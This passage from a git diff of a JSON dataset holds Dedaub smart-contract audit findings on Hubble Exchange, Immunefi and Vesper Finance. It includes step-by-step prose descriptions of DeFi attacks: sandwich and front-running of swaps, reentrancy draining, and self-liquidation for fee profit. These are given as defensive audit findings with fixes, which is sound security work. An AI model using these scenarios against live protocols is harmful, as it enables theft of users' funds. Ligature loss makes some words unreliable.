However, this line does not really check anything; the test will pass even if submitCommentary reverts. The correct test would be: await expect(Notary.connect(Operator).submitCommentary(BYTES32_STRING)).not.to.be.reverted; Many similar cases exist in commentary_tests.js, contract_tests.js and test/distributor_tests.js (and possibly elsewhere). In the following case, adding the .not.to.be.reverted revealed logic errors in the test: it(\"Validating the attestation on disclosed report `AFTER` ATTESTATION_DELAY\", async function () { await Notary.connect(Triager).attest(reportRoot, kk, commit) await expect(Notary.connect(Triager).disclose(reportRoot, key, salt, value, merkleProofval)) const increaseTime = ATTESTATION_DELAY * 60 * 60 // ATTESTATION_DELAY in `hour` format x 60 min x 60 sec await ethers.provider.send(\"evm_increaseTime\", [increaseTime]) // 1. increase block time await ethers.provider.send(\"evm_mine\") // 2. then mine the block ... Here, disclose is executed before the ATTESTATION_DELAY so it should fail, although the test makes it look like it should succeed. The reason why the test passes is that: 1. The await expect(...) line performs no checks 2. Moreover, this line does not wait for the transaction to finish, so although disclose is launched before moving time forward, it is executed in the future block, after the time delay, and as a consequence it succeeds. So, if .not.to.be.reverted is added to the await expect(...) line, the test will fail, unless the line is moved after the time increase.", "labels": [ "Dedaub", "Immunefi", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", "body": "variables Resolved There are some variables in contracts Distributor.sol and TokenMinter.sol that are assigned during contract construction and can never change thereafter. In Distributor.sol: /// Only settable by the initializer. bool public override callEnabled; address public override nftHolder; uint256 public override maxBeneficiaries In TokenMinter.sol: /// This is initialized by the deployer. The token is completely trusted. 
IImmunefiToken public override token; We suggest these variables be declared immutable for clarity and gas efficiency.", "labels": [ "Dedaub", "Immunefi", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", "body": "receive hook Dismissed (hook needed by IVestingNFTFunder.vestingNFTCallback) The receive() hook in VestingNFT is not to be used intentionally, since ETH is received via mint(). It would be better to revert, to avoid accidentally receiving ETH.", "labels": [ "Dedaub", "Immunefi", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", "body": "need to construct a Merkle Tree can be easily avoided Open A large amount of code (MerkleTree.sol / QuickSort.sol) is aimed at constructing (rather than verifying) a Merkle tree. However, this is only used by BugReportNotary.assignNullCommentary to construct a tree for a trivial empty commentary. This can be easily avoided by having a hard-coded constant value NULL_COMMENTARY that denotes an empty commentary. 
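As a sketch only, assuming the root of an empty commentary can be precomputed from the existing tree encoding: bytes32 internal constant NULL_COMMENTARY = keccak256(\"\"); the concrete value and hashing scheme must of course follow the tree format actually used, which we do not reproduce here. 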
The call to discloseCommentary can be omitted in this case 11 (or discloseCommentary can simply check that the value is empty) and NULL_COMMENTARY can be immediately set as canonical.", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Medium" + "Immunefi", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "amount is not reset on liquidation RESOLVED A makers liquidation calls method AMM::forceRemoveLiquidity, which in turn calls AMM::_removeLiquidity and operates in the same manner as the regular removeLiquidity thereafter, but does not reset a pending unbonding amount that the maker might have. The function AMM::removeLiquidity on the other hand, deducts the unbonding amount accordingly: Maker storage _maker = _makers[maker]; _maker.unbondAmount -= amount;", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "code Partially resolved (dead code still present in LinearVesting.sol) In vesting schedule CliffVesting.sol function _decodeParams() is supposed to return a uint256 value function _decodeParams(bytes calldata params) internal pure returns (uint256 cliffTime) { cliffTime = abi.decode(params, (uint256)); } However, this schedule requires an empty parameter list function checkParams(CommonParameters calldata input) external pure override { require(input.params.length == 0); } All three internal functions _decodeParams(), _decodeState() and decodeContext() are never called for CliffVesting, while the later two are also never called for LinearVesting schedules. We suggest that all unused functions be removed for clarity and gas savings. Alternatively, the current body of CliffVesting::_decodeParams should be removed.", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Medium" + "Immunefi", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "function argument Resolved (argument is not redundant for code extensibility reasons) In KeeperRewards::keeperRewards the rst argument is redundant function keeperRewards(address, uint256 value) external pure override returns (uint256) { return value / 1000; } We suggest it be removed for clarity. Also, the constant 1000 in the same code is an arbitrary magic constant, best given a name to document intent.", + "labels": [ + "Dedaub", + "Immunefi", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "Liquidations ACKNOWLEDGED 0 The risk of cascading liquidations in Hubble are relatively high, especially where maker liquidations are concerned. Takers are relatively protected from triggering liquidations of other takers due to the dual mode margin fraction mechanism (which uses oracle prices in cases of large divergences between mark and index prices). However, a taker liquidation can trigger a maker liquidation (see M1). In turn the removal of maker liquidity makes the price derived via Swap::get_dy and Swap::get_dx lower. 
The following are our inferred cascading liquidation risks: - Taker liquidation triggering a taker liquidation (low) - Maker liquidation triggering a taker liquidation (medium, eect of swap price movement in addition to the eect of removal of liquidity) - Maker liquidation triggering a maker liquidation (high, see M1) - Taker liquidation triggering a maker liquidation (high, see M1)", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "calling pattern Resolved 12 In BugReportNotary the MerkleProof::verify function is called with different syntax. Once as: merkleProof.verify(reportRoot, leafHash) and once as: MerkleProof.verify(merkleProof, commentaryRoot, leafHash) We recommend making uniform for consistency.", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Medium" + "Immunefi", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "stakers who double as liquidators can increase their share of the pool RESOLVED [This issue was partially known to the developers] If an insurance staker also doubles as a liquidator, then they can: 1. Withdraw their insurance contribution 2. Liquidate bad debt 3. Sele bad debt using other users insurance stake 4. Re-deposit their stake again The liquidator/staker now owns a larger portion of the pool. This eect can be compounded. Opening multiple tiny positions to make liquidations", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "in vestingNFT Info The README asks for possible ways to remove ReentrancyGuard from vestingNFT. We believe that these guards are critical and advise against trying to remove them (we see no safe way to do so, while keeping the dynamic way of computing the amount of transferred tokens). In particular, a reentrancy to mint from withdraw will directly lead to a severe loss of funds. Currently this is indirectly protected by the nonReentrant ag in _deposit and _beforeTokenTransferInner (we recommend clearly documenting the importance of these ags, to prevent them from getting accidentally removed).", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Medium" + "Immunefi", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "unprotable 0 There are no restrictions on the minimum size of the position a user can open and on the minimum amount of collateral he should deposit when an account is opened. A really small position will be unprotable for an arbitrageur to liquidate. An adversary could take advantage of this fact and open a huge number of tiny positions, using dierent accounts. The adversary might not be able to get a direct prot from such an approach, but since these positions are going to stay open for a long time, as no one will have a prot by liquidating them, they can signicantly shift the price of the vAMM with small risk. To safeguard against such aacks we suggest that a lower bound on the position size and collateral should be used. 
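For illustration, such a bound could take the hypothetical form require(notionalPosition >= MIN_NOTIONAL && margin >= MIN_MARGIN, \"position too small\"); (identifier names are ours, not the protocol's), enforced wherever positions are opened or liquidity is added. 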
Liquidating own tiny maker position to prot from the xed", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "funds in a single contract (VestingNFT) Info The architecture stores all ERC-20 tokens (assets) in a single contract (VestingNFT), and accounting for how they are shared among many different NFTs/bounties. This is a decision that puts a signicant burden on asset accounting. It should be simpler/safer to have a treasury contract that indexes assets by NFT and keeps assets entirely separate. However, the current design seems to exist in order to support ERC-20 tokens that change in number, with time. This certainly necessitates a shares model instead of a separate accounts model. It may be good to document exactly the behavior of tokens that the designer of the contract expects, with specic token examples. There are certainly token models that will not be supported by the current design, and others that are. A more radical approach could also be to use a clone of VestingNFT for each bounty (similarly to how clones of vestingNTFReceiver are used), so that funds for each bounty are kept in a separate contract. Apart from facilitating the accounting (no need for a \"shares\" model), this design would likely mitigate the losses from a critical bug (the adversary could drain a single bounty but not all of them).", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Medium" + "Immunefi", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "fee As discussed in issue M6, one can open a however small position they want. The same is true when providing liquidity. On the other hand the incentive fee for liquidating a maker, i.e., someone that provides liquidity, is xed and its 20 dollars as dened in ClearingHouse::fixedMakerLiquidationFee. Thus, one could provide really tiny amounts of liquidity (with tiny amounts of collateral backing it) and liquidate themselves with another account to make a prot from the liquidation fee. Networks with small transaction fees (e.g., Avalanche) or", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "code Resolved 13 The function QuickSort::sort admits some simplications/dead-code elimination. Some of these are only possible under the invariant left < right (which is true in the current uses of the function), others regardless. We highlight them in the four code comments below. function sort( bytes32[] memory arr, uint256 left, uint256 right // Dedaub: invariant: left < right ) internal pure { uint256 i = left; uint256 j = right; if (i == j) return; // Dedaub: dead code, under invariant bytes32 pivot = arr[left + (right - left) / 2]; while (i <= j) { // Dedaub: definitely true the first time, under invariant, // loop could be a do..while while (arr[i] < pivot) i++; while (pivot < arr[j]) j--; if (i <= j) { // Dedaub: always the case, no need to check (arr[i], arr[j]) = (arr[j], arr[i]); i++; j--; } } if (left < j) sort(arr, left, j); if (i < right) sort(arr, i, right); }", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Medium" + "Immunefi", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "could make such an aack really protable, especially if executed on a large scale. 
ClearingHouse::isMaker does not take into account makers", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "cannot recover from renouncing Dismissed (intended behavior) In the ImplOwnable contract (currently unused) if the owner calls renounceOwnership, no new owner can be installed. It is unclear whether this is intentional and whether the contract will be used in the future.", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Low" + "Immunefi", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "ignition share Method ClearingHouse::isMaker checks if a user is a maker by implementing the following check: function isMaker(address trader) override public view returns(bool) { uint numAmms = amms.length; for (uint i; i < numAmms; ++i) { IAMM.Maker memory maker = amms[i].makers(trader); if (maker.dToken > 0) { 0 return true; } } return false; } However, the AMM could still be in the ignition phase, meaning that the maker could have provided liquidity that in maker.ignition. This omission could allow liquidation of a users taker positions before its maker positions, which is something undesirable, as dened by the liquidate and liquidateTaker methods of ClearingHouse. reflected in maker.dToken but is not yet", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "for contract size Info 14 For the bytecode size issues of VestingNFT, our suggestion would be to create a VestingNFT library contract (containing all functions that do not heavily involve storage slots, such as pure functions, some views that only affect 1-2 storage slots) and have calls in VestingNFT delegate to the library versions. Shorter-term solutions might exist (e.g., removing one of the super-contracts, such as DelegateGuard, in some way) but they will not save a large contract from bumping against size limits for long.", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Medium" + "Immunefi", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "Slippage Sandwich Attack ACKNOWLEDGED [The aack is related to already known issues, but is documented in more detail here] 1. Alice has a long position that is underwater 2. Bob opens a large short position 3. Bob liquidates Alice. This triggers a swap in the same direction as Bobs position and causes slippage. 4. Bob closes his position, and prots on the slippage at the expense of Alice. M10 Self close bad debt attack DISMISSED This is a non-specic aack on the economics of the protocol. 1. Alice opens a short position using account A 2. Alice opens a large long position using account B 3. In the meantime, the market moves up. 4. Alice closes her under-collateralized position A. Bad debt occurs. 5. Alice can now close position B and realize her prot 09 LOW SEVERITY: ", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "pragma Open Use of a oating pragma: The oating pragma pragma solidity ^0.8.6; is used, allowing contracts to be compiled with any version of the Solidity compiler that is greater or equal to v0.8.6 and lower than v.0.9.0. Although the differences between these versions should be small, for deployment, oating pragmas should ideally be avoided and the pragma be xed. 
A15 Compiler known issues Info Solidity compiler v0.8.6, at the time of writing, has no known bugs. 15", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Medium" + "Immunefi", + "Severity: Informational" ] }, { - "title": "neutra ", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": " ACKNOWLEDGED Maker debt, calculated as the vUSD amount * 2 when the liquidity was added never changes. If the maker has gained out of her impermanent position, e.g., through fees, this is not accounted for, in certain kinds of liquidations (via oracle). However, if the maker now removes their liquidity, closes their impermanent position and adds the same amount of liquidity, the debt is reset to a dierent amount.", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "(or consulting an oracle for pricing) can be front-run Status Open 4 There are many instances of Uniswap/Sushiswap swaps and oracle queries (mainly wrapped in calls to to the internal swapManager.safeGetAmountsOut, swapTokensForExactTokens, bestOutputFixedInput) that can be front-run or return biased results through tilted exchange pools. Fixing this requires careful thought, but the codebase has already started integrating a simple time-weighted average price oracle. function Strategy::_safeSwap, but also as direct calls calls and to We have warned about such swaps in past audits and the saving grace has been that the swapped amounts are small: typically interest/reward payments only. Thus, tilting the exchange pool is not protable for an attacker. In CompoundXYStrategy (which contains many of these calls), swaps are performed not just from the COMP rewards token but also from the collateral token. Similarly, in the Earn strategies, the _convertCollateralToDrip does an unrestricted collateral swap, on the default path (no swapSlippage dened). Swapping collateral (up to all available) should be ne if the only collateral token amounts held in the strategy at the time of the swap are from exchanging COMP or other rewards. Still, this seems like a dangerous practice. Standard background: The problem is that the swap can be sandwiched by an attacker collaborating with a miner. This is a very common pattern in recent months, with MEV (Maximum Extractable Value) attacks for total sums in the hundreds of millions. The current code complexity offers some small protection: typically attackers colluding with miners currently only attack the simplest, lowest-risk (to them) transactions. However, with small code analysis of the Vesper code, an attacker can recognize quickly the potential for sandwiching and issue an attack, rst tilting the swap pool and then restoring it, to retrieve most of the funds swapped by the Vesper code. In the current state of the code, the attacker will likely need to tilt two pools: both Uniswap and Sushiswap. However, this also offers little protection, since they both use similar on-chain price computations and near-identical APIs. In the short-term, deployed code should be closely monitored to ensure the swapped amounts are very small (under 0.3%) relative to the size of the pools involved. Also, if an attack is detected, the contract should be paused to avoid repeat attacks. However, the code should evolve to have an estimate of asset pricing at the earliest possible time! 
This can be achieved by using the TWAP functionality that is already being added, with some tolerance based on this expected price.", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Low" + "Vesper Pools+Strategies September", + "Severity: High" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "blacklisting checks are incomplete RESOLVED The ClearingHouse contract can set and use a Blacklist contract to ban certain users from opening new positions. However, these same users are not blacklisted from providing liquidity to the protocol, i.e., having impermanent positions, which can be turned into permanent ones when the liquidity is removed. Although this form of opening positions is not controllable, it would be beer if blacklisted users were also banned from providing liquidity.", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "non-standard ERC20 Tokens can be stuck inside the Resolved VFRBuffer 5 The VFRBuffer does not use the safeERC20 library for the transfer of ERC20 tokens. This can cause non-standard tokens (for example USDT) to be unable to be transferred inside the Buffer and get stuck there. This issue would normally be ranked lower, but since USDT is actively used in past strategies, it seems likely to arise with upcoming instantiations of the VFR pool. Medium Severity Nr. Description", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Low" + "Vesper Pools+Strategies September", + "Severity: High" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "could potentially be reentered RESOLVED VUSD::processWithdrawals of the VUSD contract calls method safeTransfer on the reserveToken dened in VUSD. 01 function processWithdrawals() external whenNotPaused { uint reserve = reserveToken.balanceOf(address(this)); require(reserve >= withdrawals[start].amount, 'Cannot process withdrawals at this time: Not enough balance'); uint i = start; while (i < withdrawals.length && (i - start) < maxWithdrawalProcesses) { Withdrawal memory withdrawal = withdrawals[i]; if (reserve < withdrawal.amount) { break; } reserve -= withdrawal.amount; reserveToken.safeTransfer(withdrawal.usr, withdrawal.amount); i += 1; } start = i; } In the unlikely scenario that the safeTransfer method (or a method safeTransfer calls internally) of reserveToken allows calling an arbitrary contract, then that contract can reenter the processWithdrawals method. As the start storage variable will not have been updated (it is updated at the very end of the method), the same withdrawal will be executed twice if the contracts reserveToken balance is suicient. Actually, if reentrancy is possible, the whole balance of the contract can be drained by reentering multiple times. It is easier to perform this aack if the aackers withdrawal is the rst to be executed, which is actually not hard to achieve. This vulnerability is highly unlikely, as it requires the execution reaching an untrusted contract, still we suggest adding a reentrancy guard (minor overhead) to completely remove the possibility of such a scenario. 
01 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them.", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "rewards might get stuck in CompoundLeverageStrategy Status Dismissed (Normal path: rebalance before migrate) CompoundLeverageStrategy does not offer a way to migrate COMP tokens that might have been left unclaimed by the strategy up to the point of migration. What is more, COMP is declared a reserved token by CompoundMakerStrategy making it impossible to sweep the strategys COMP balance even if a claim is made to Compound after the migration. The _beforeMigration hook should be extended to account for the claim and consequent transfer of COMP tokens to the new strategy as follows: function _beforeMigration(address _newStrategy) internal virtual override { require(IStrategy(_newStrategy).token() == address(cToken), \"wrong-receipt-token\"); minBorrowLimit = 0; // It will calculate amount to repay based on borrow limit and payback all _reinvest(); // Dedaub: Claim COMP and transfer to new strategy. _claimComp(); IERC20(COMP).safeTransfer(_newStrategy,IERC20(COMP).balanceOf(address(this))); }", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Low" + "Vesper Pools+Strategies September", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "usage increases quadratically to positions ACKNOWLEDGED Whenever a users position is modied, maintained or liquidated, all of the users token positions need to be queried (both maker and taker). For instance, this happens in ClearingHouse::getTotalNotionalPositionAndUnrealizedPnl for (uint i; i < numAmms; ++i) { if (amms[i].isOverSpreadLimit()) { (_notionalPosition, _unrealizedPnl) = amms[i].getOracleBasedPnl(trader, margin, mode); } else { (_notionalPosition, _unrealizedPnl,,) = amms[i].getNotionalPositionAndUnrealizedPnl(trader); } notionalPosition += _notionalPosition; unrealizedPnl += _unrealizedPnl; } Therefore, if we assume that a user with more positions and exposure to more tokens needs to tweak their positions from time to time, and the number of actions correlates the number of positions, the gas usage really scales quadratically to the number of positions for such a user.", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "rewards might get stuck in CompoundXYStrategy Dismissed (as above) 6 The _beforeMigration hook of CompoundXYStrategy calls _repay and lets it handle the claim of COMP and its conversion to collateral, thus no COMP needs to be transferred to the new strategy prior to migration. However, the claim in _repay happens only when the condition _repayAmount > _borrowBalanceHere evaluates to true, which might not always hold prior to migration, leading to COMP getting stuck in the strategy. 
This is because COMP is declared a reserved token and thus cannot be swept after migration.", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Informational" + "Vesper Pools+Strategies September", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "regarding the numerical methods of CurveMath.vy ACKNOWLEDGED [Below we use the notation of the curve crypto whitepaper] The CurveCrypto invariant in the case of pools with only two assets (N=2) can be simplied into a low degree polynomial, which could lead to a faster convergence of the numerical methods. 01 The coeicient K, when N=2 (we denote by x and y the deposits of the two assets in the pool), is given by the formula If we multiply both sides of the equation an equivalent equation, which is polynomial in all three variables x, y and D: by the denominator of K we get As you can see it is a cubic equation for x and y and you can use the formulas for cubic equations either to compute faster the solution or to get a beer initial value for the iterative method you are currently using. We believe it would be worth spending some time experimenting with the numerical methods to get the fastest possible convergence (and consequently reduced gas fees paid by the users).", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "Compound markets are never entered Dismissed (unnecessary) The CompoundLeverageStrategys CToken market Comptroller. This leaves the strategy unable to borrow from the specied CToken. is never entered via Compounds", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Informational" + "Vesper Pools+Strategies September", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "functionality to remove AMMs ACKNOWLEDGED Governance has the ability to whitelist AMMs via ClearingHouse::whitelistAmm method, while there is no functionality to remove or blacklist an AMM.", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "The checkpoint method only considers proting strategies when computing the total prots of a pools strategies Resolved The checkpoint() method of the VFRStablePool iterates over the pools strategies to compute their total prots and update the pools predictedAPY state variable: address[] memory strategies = getStrategies(); uint256 profits; // SL: Is it ok that it doesn't consider strategies at a loss? for (uint256 i = 0; i < strategies.length; i++) { (, uint256 fee, , , uint256 totalDebt, , , ) = IPoolAccountant(poolAccountant).strategy(strategies[i]); uint256 totalValue = IStrategy(strategies[i]).totalValueCurrent(); if (totalValue > totalDebt) { uint256 totalProfits = totalValue - totalDebt; uint256 actualProfits = totalProfits - ((totalProfits * fee) / MAX_BPS); profits += actualProfits; } } The above computation disregards the losses of any strategies that are not proting. Due to that the predicted APY value will not be accurate. 
7", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Informational" + "Vesper Pools+Strategies September", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "collateral index checks are missing ACKNOWLEDGED There are several external methods of MarginAccount, namely addMargin, addMarginFor, removeMargin, liquidateExactRepay and liquidateExactSeize that do not implement a check on the collateral index supplied, which can lead to the ungraceful termination of the transaction if an incorrect index has been supplied. A simple check such as: require(idx < supportedCollateral.length, \"Collateral not supported\"); could be used to also inform the user of the problem with their transaction. 01", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "CompoundXY strategy does not account for rapid rise of Resolved borrow token price (This issue was also used earlier as an example in our architectural recommendations.) The CompoundXY strategy seeks to repay a borrowed amount if its value rises more than expected. However, volatile assets can rise or drop in price dramatically. (E.g., a collateral stablecoin can lose its peg, or a tokens price can double in hours.) This means that the Compound loan may become undercollateralized. In this case, the borrowed amount may be worth more than the collateral, so it would be benecial for the strategy to not repay the loan. Furthermore, it might be the case that the collateral gets liquidated before the strategy rebalances. In this case the strategy will be left with borrow tokens that it can neither transfer nor swap. The strategy can be enhanced to account for the rst of these cases, and the overall architecture can adopt an emergency rescue mechanism for possibly stuck funds. This emergency rescue would be a centralization element, so it should only be authorized by governance. M6 CompoundXYStrategy, CompoundLeverageStrategy: Error code of Mostly Resolved Compound API calls ignored, can lead to silent failure of functionality The calls to many state-altering Compound API calls return an error code, with a 0-value indicating success. These error codes are often ignored, which can cause certain parts of the strategies functionality to fail, silently. The calls with their error status ignored are: CompoundXYStrategy::constructor: Comptroller.enterMarkets() CompoundXYStrategy::updateBorrowCToken: Comptroller.exitMarket(), Comptroller.enterMarkets(), CToken.borrow() CompoundXYStrategy::_mint: CToken.mint() (is returned but not check by the callers of _mint()) CompoundXYStrategy::_reinvest: CToken.borrow() CompoundXYStrategy::_repay: CToken.repayBorrow() CompoundXYStrategy::_withdrawHere: CToken.redeemUnderlying() CompoundLeverageStrategy::_mint: CToken.mint() CompoundLeverageStrategy::_redeemUnderlying: CToken.redeemUnderlying() CToken.redeem(), CompoundLeverageStrategy::_borrowCollateral: CToken.borrow() CompoundLeverageStrategy::_repayBorrow: CToken.repayBorrow() 8 Low Severity Nr. 
", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Informational" + "Vesper Pools+Strategies September", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "event is missing timestamp field ACKNOWLEDGED The AMM::PositionChanged event is potentially missing a timestamp field that all other related events (LiquidityAdded, LiquidityRemoved, Unbonded) incorporate.", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "ALPHA rewards are not claimed on-chain Status Open The _claimRewardsAndConvertTo() method of the Alpha lend strategy does not do what its name and comments indicate it does. It only converts the claimed ALPHA tokens. The actual claiming of the funds does not appear to happen using an on-chain API.", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Informational" + "Vesper Pools+Strategies September", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "out code ACKNOWLEDGED In method MarginAccount::isLiquidatable the following line is commented out: _isLiquidatable = IMarginAccount.LiquidationStatus.IS_LIQUIDATABLE; This is because IMarginAccount.LiquidationStatus.IS_LIQUIDATABLE is equal to 0, which will be the default value of _isLiquidatable if no value is assigned to it, thus the above assignment is not necessary. Nevertheless, explicitly assigning the enum value makes the code much more readable and intuitive.", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "storage field Resolved In CompoundLeverageStrategy, field borrowToken is unused. A comment mentions it but does not match the code. L3 Two swaps could be made into one, for fee savings Dismissed, detailed consideration In CompoundXYStrategy::_repay, COMP is first swapped into collateral, and then collateral (which should be primarily, if not exclusively, the swapped COMP) is swapped to the borrow token. This incurs double swap fees. Other/Advisory Issues This section details issues that are not thought to directly affect the functionality of the project, but we recommend addressing.", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Informational" + "Vesper Pools+Strategies September", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "constants ACKNOWLEDGED There are several magic constants throughout the codebase, many of them related to the precision of token amounts, making it difficult to reason about the correctness of certain computations. The developers of the protocol are aware of the issue and claim that they have developed extensive tests to make sure nothing is wrong in this regard.", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "contract seems to serve no purpose Status Open This contract currently does nearly nothing. It is neither inherited nor does it export functionality that makes it usable as part of a VFR strategy.
9", "labels": [ "Dedaub", - "Hubble Exchange", + "Vesper Pools+Strategies September", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "price decimals assumption ACKNOWLEDGED The Oracle contract code makes the assumption that the price value returned by the ChainLink oracle has 8 decimals. This assumption appears to be correct if the oracles used report the price in terms of USD. Nevertheless, using the oracles available decimals method and avoiding such a generic assumption would make the code much more robust.", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "contract is there only for code reuse Open The VFR contract currently has the form: abstract contract VFR { function _transferProfit(...) internal virtual returns (uint256) {...} function _handleStableProfit(...) internal returns (uint256 _profit) {...} function _handleCoverageProfit(...) internal returns (uint256 _profit) {...} } It is, thus, a contract that merely denes internal functions, used via inheritance, for code reuse purposes. Inheritance for code reuse is often considered a bad, low-level coding practice. A similar effect may be more cleanly achieved via use of a library.", "labels": [ "Dedaub", - "Hubble Exchange", + "Vesper Pools+Strategies September", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "can be reused ACKNOWLEDGED 01 The following code shared by methods MarginAccount::liquidateExactRepay and MarginAccount::liquidateExactSeize can be factored out in a separate method and reused: clearingHouse.updatePositions(trader); // credits/debits funding LiquidationBuffer memory buffer = _getLiquidationInfo(trader, idx); if (buffer.status != IMarginAccount.LiquidationStatus.IS_LIQUIDATABLE) { revert NOT_LIQUIDATABLE(buffer.status); } In addition, all the code of AMM::isOverSpreadLimit: function isOverSpreadLimit() external view returns(bool) { if (ammState != AMMState.Active) return false; uint oraclePrice = uint(oracle.getUnderlyingPrice(underlyingAsset)); uint markPrice = lastPrice(); uint oracleSpreadRatioAbs; if (markPrice > oraclePrice) { oracleSpreadRatioAbs = markPrice - oraclePrice; } else { oracleSpreadRatioAbs = oraclePrice - markPrice; } oracleSpreadRatioAbs = oracleSpreadRatioAbs * 100 / oraclePrice; if (oracleSpreadRatioAbs >= maxOracleSpreadRatio) { return true; } return false; } except line uint markPrice = lastPrice(); can be factored out in another method, e.g., _isOverSpreadLimit(uint markPrice), which will have markPrice as an argument. Then method _isOverSpreadLimit can be reused in methods _short and _long. 